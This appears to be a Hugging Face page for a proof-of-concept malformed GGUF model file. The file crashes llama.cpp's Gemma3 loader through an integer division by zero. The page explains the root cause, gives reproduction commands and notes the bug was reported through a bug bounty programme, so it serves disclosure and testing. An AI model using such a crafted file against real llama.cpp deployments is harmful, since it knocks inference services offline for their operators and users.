How to use from the
Use from the
llama-cpp-python library
# !pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama.from_pretrained(
	repo_id="salvepilo/llama-cpp-gemma3-divzero-poc",
	filename="poc_gemma3_divzero.gguf",
)
output = llm(
	"Once upon a time,",
	max_tokens=512,
	echo=True
)
print(output)

llama.cpp Gemma3 Integer Division-by-Zero PoC

Proof-of-concept for a division-by-zero vulnerability in llama.cpp's Gemma3 architecture loader.

Vulnerable file: src/models/gemma3.cpp:32

Files

  • poc_gemma3_divzero.gguf โ€” 235-byte malicious GGUF (no tensors, triggers SIGFPE on x86_64)
  • reproducer.cpp โ€” standalone C++ reproducer (no llama.cpp build needed)

Quick test

# Standalone (no llama.cpp needed)
g++ -o reproducer reproducer.cpp -fsanitize=undefined -fno-sanitize-recover=all
./reproducer
# Expected: runtime error: division by zero

# With llama.cpp
./llama-cli -m poc_gemma3_divzero.gguf -p 'hello'
# Expected on x86_64: Floating point exception (exit 136)

Root cause

When block_count=62 (โ†’ LLM_TYPE_27B) and attention.head_count is absent from the GGUF, n_head(0) returns 0 and the expression n_embd / n_head(0) is integer division-by-zero.

Reported via Huntr bug bounty program.

Downloads last month
17
GGUF
Model size
0 params
Architecture
gemma3
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support